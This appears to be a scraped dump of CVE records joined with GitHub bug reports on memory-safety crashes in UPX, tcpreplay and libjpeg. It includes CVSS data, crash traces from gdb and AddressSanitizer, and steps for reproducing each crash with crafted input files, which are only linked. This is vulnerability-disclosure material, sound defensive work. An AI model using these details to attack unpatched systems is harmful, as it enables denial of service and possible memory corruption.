{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/eb90eab6325d009004ffb155e3e33f22d4d3ca26" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/331
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## The environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) root@ubuntu:/home/upx_cp_2/src# ./upx.out --version upx 3.96-git-0f4975fd7ffb+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov Triggered by ./upx.out -1 POC OS: Ubuntu 16.04.6 LTS CPU architecture: x86_64 ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/poc) ## The Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_cp_2/src# ./upx.out -1 /home/upx_out_cp/crashes/poc Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- p_lx_elf.cpp:5108:42: runtime error: division by zero Floating point exception root@ubuntu:/home/upx_cp_2/src# gdb upx.out GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1 Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from upx.out...done. gdb-peda$ set args -1 /home/upx_out_cp/crashes/poc gdb-peda$ r Starting program: /home/upx_cp_2/src/upx.out -1 /home/upx_out_cp/crashes/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- p_lx_elf.cpp:5108:42: runtime error: division by zero Program received signal SIGFPE, Arithmetic exception. [----------------------------------registers-----------------------------------] RAX: 0x858 RBX: 0xffffffff968 --> 0x0 RCX: 0x74051a61d47fab1f RDX: 0x0 RSI: 0x7fffffffca80 --> 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 (--> ...) RDI: 0x0 RBP: 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 --> 0x7fffffffd5d0 (--> ...) RSP: 0x7fffffffca90 --> 0x7fffffffcb40 --> 0x41b58ab3 RIP: 0x573627 (<PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8865>: div rdi) R8 : 0x1 R9 : 0x9 ('\t') R10: 0x0 R11: 0x246 R12: 0x7fffffffccc0 --> 0x7fffffffccf0 --> 0x7fffffffd360 --> 0x7fffffffd3a0 --> 0x7fffffffd560 --> 0x7fffffffd5a0 (--> ...) R13: 0x7fffffffcb40 --> 0x41b58ab3 R14: 0x61b00001f180 --> 0x965330 --> 0x4dfb9c (<PackLinuxElf64amd::~PackLinuxElf64amd()>: push rbp) R15: 0x63000000f2e0 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x573615 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8847>: sub rax,QWORD PTR [rbp-0x1f0] 0x57361c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8854>: mov edi,DWORD PTR [rbp-0x224] 0x573622 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8860>: mov edx,0x0 => 0x573627 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8865>: div rdi 0x57362a <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8868>: mov r14d,eax 0x57362d <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8871>: mov rax,QWORD PTR [rbp-0x248] 0x573634 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8878>: cmp QWORD PTR [rbp-0x248],0x0 0x57363c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8886>: je 0x573649 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8899>: je 0x573649 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+8899> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffca90 --> 0x7fffffffcb40 --> 0x41b58ab3 0008| 0x7fffffffca98 --> 0xffffffff --> 0x0 0016| 0x7fffffffcaa0 --> 0x63000000f398 --> 0x0 0024| 0x7fffffffcaa8 --> 0x61b00001f180 --> 0x965330 --> 0x4dfb9c (<PackLinuxElf64amd::~PackLinuxElf64amd()>: push rbp) 0032| 0x7fffffffcab0 --> 0x0 0040| 0x7fffffffcab8 --> 0xb00000018 --> 0x0 0048| 0x7fffffffcac0 --> 0x90000000a --> 0x0 0056| 0x7fffffffcac8 --> 0xc ('\x0c') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGFPE 0x0000000000573627 in PackLinuxElf64::invert_pt_dynamic (this=0x61b00001f180, dynp=0x63000000f398) at p_lx_elf.cpp:5108 5108 symnum_end = (v_str - v_sym) / sz_sym; gdb-peda$
SIGFPE divide by zero in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5108
https://api.github.com/repos/upx/upx/issues/331/comments
2
2020-01-13T07:11:42Z
2022-08-18T21:42:09Z
https://github.com/upx/upx/issues/331
548,744,640
331
CVE-2020-27788
2022-08-18T20:15:08.947
An out-of-bounds read access vulnerability was discovered in UPX in PackLinuxElf64::canPack() function of p_lx_elf.cpp file. An attacker with a crafted input file could trigger this issue that could cause a crash leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/1bb93d4fce9f1d764ba57bf5ac154af515b3fc83" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/332" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A4A2432-18AE-4B27-A527-030DD9D34F93", "versionEndExcluding": "3.96", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/332
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
## Environment A crafted input will lead to crash in p_lx_elf.cpp at UPX 3.96(latest version,git clone from branch devel) root@ubuntu:/home/upx_cp_2/src# ./upx.out --version upx 3.96-git-0f4975fd7ffb+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov ## POC [poc](https://github.com/cxy20103657/software_poc/blob/master/upx_poc1) ## Problem The debug information is as follows: open BUILD_TYPE_DEBUG ?= 1 BUILD_TYPE_SANITIZE ?= 1 root@ubuntu:/home/upx_cp_2/src# ./upx.out -1 /home/upx_out_cp/crashes/poc1 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-0f4975+ Markus Oberhumer, Laszlo Molnar & John Reiser Jan 12th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- ================================================================= ==104331==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000001f269 at pc 0x7fcdfaf852fd bp 0x7ffc36d39f70 sp 0x7ffc36d39718 READ of size 1 at 0x63000001f269 thread T0 #0 0x7fcdfaf852fc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x472fc) #1 0x5077e1 in PackLinuxElf64::canPack() /home/upx_cp_2/src/p_lx_elf.cpp:2385 #2 0x7cbd70 in try_pack /home/upx_cp_2/src/packmast.cpp:91 #3 0x7d37e2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/upx_cp_2/src/packmast.cpp:194 #4 0x7d9bee in PackMaster::getPacker(InputFile*) /home/upx_cp_2/src/packmast.cpp:240 #5 0x7da15b in PackMaster::pack(OutputFile*) /home/upx_cp_2/src/packmast.cpp:260 #6 0x884dc8 in do_one_file(char const*, char*) /home/upx_cp_2/src/work.cpp:158 #7 0x88624e in do_files(int, int, char**) /home/upx_cp_2/src/work.cpp:271 #8 0x468b28 in main /home/upx_cp_2/src/main.cpp:1539 #9 0x7fcdf96d582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x4030f8 in _start (/home/upx_cp_2/src/upx.out+0x4030f8) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0c607fffbdf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c607fffbe40: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa 0x0c607fffbe50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==104331==ABORTING
heap-buffer-overflow in PackLinuxElf64::canPack() at p_lx_elf.cpp:2385
https://api.github.com/repos/upx/upx/issues/332/comments
2
2020-01-13T08:10:55Z
2022-08-18T22:37:18Z
https://github.com/upx/upx/issues/332
548,768,610
332
CVE-2022-37047
2022-08-18T20:15:11.837
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/734" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/appneta/tcpreplay/issues/734
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** There is a heap-overflow bug in get_ipv6_next. Different from #718 (The crash point is in line 679, `*((int*)((u_char *)exthdr + len))`), this bug is triggered in line 713 (`*((int*)((u_char *)exthdr + len)) > maxlen`). **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. ./src/tcprewrite -o /dev/null -i POC **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** <img width="623" alt="Screen Shot 2022-07-24 at 10 37 33" src="https://user-images.githubusercontent.com/70422882/180629803-80760126-78ce-432e-8fab-351bdc3b756e.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175011/poc.zip)
[Bug] heap-overflow in get.c:713
https://api.github.com/repos/appneta/tcpreplay/issues/734/comments
1
2022-07-24T02:43:39Z
2022-08-07T02:02:04Z
https://github.com/appneta/tcpreplay/issues/734
1,315,792,459
734
CVE-2022-37048
2022-08-18T20:15:11.880
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/735" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/appneta/tcpreplay/issues/735
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** A clear and concise description of what the bug is. There is a heap-overflow bug in get_ipv6_next. Different from #716 (The crash point is in line 322, `ntohs(eth_hdr->ether_type);`), this bug is triggered in line 344 (`pktdata[l2_net_off] >> 4`). **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** If applicable, add screenshots to help explain your problem. <img width="686" alt="Screen Shot 2022-07-24 at 15 32 38" src="https://user-images.githubusercontent.com/70422882/180637125-e59c7e8e-3094-46f7-8331-af1222bc514a.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** Add any other context about the problem here. **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175320/poc.zip)
[Bug] heap-overflow in get.c:344
https://api.github.com/repos/appneta/tcpreplay/issues/735/comments
1
2022-07-24T07:35:35Z
2022-08-07T02:55:11Z
https://github.com/appneta/tcpreplay/issues/735
1,315,833,757
735
CVE-2022-37049
2022-08-18T20:15:11.927
The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/736" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/appneta/tcpreplay/issues/736
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** A clear and concise description of what the bug is. There is a heap-overflow bug in get.c:150. This bug is different from #719 that crashes in get.c:118. **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. ./src/tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** If applicable, add screenshots to help explain your problem. <img width="683" alt="Screen Shot 2022-07-24 at 22 39 00" src="https://user-images.githubusercontent.com/70422882/180652127-8d4681df-406d-4ab6-9881-09ba2bc03bb9.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** Add any other context about the problem here. **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175989/poc.zip)
[Bug] heap-overflow in get.c:150
https://api.github.com/repos/appneta/tcpreplay/issues/736/comments
1
2022-07-24T14:40:26Z
2022-08-07T03:03:15Z
https://github.com/appneta/tcpreplay/issues/736
1,315,924,974
736
CVE-2022-37768
2022-08-18T20:15:11.970
libjpeg commit 281daa9 was discovered to contain an infinite loop via the component Frame::ParseTrailer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/77" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/thorfdbg/libjpeg/issues/77
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
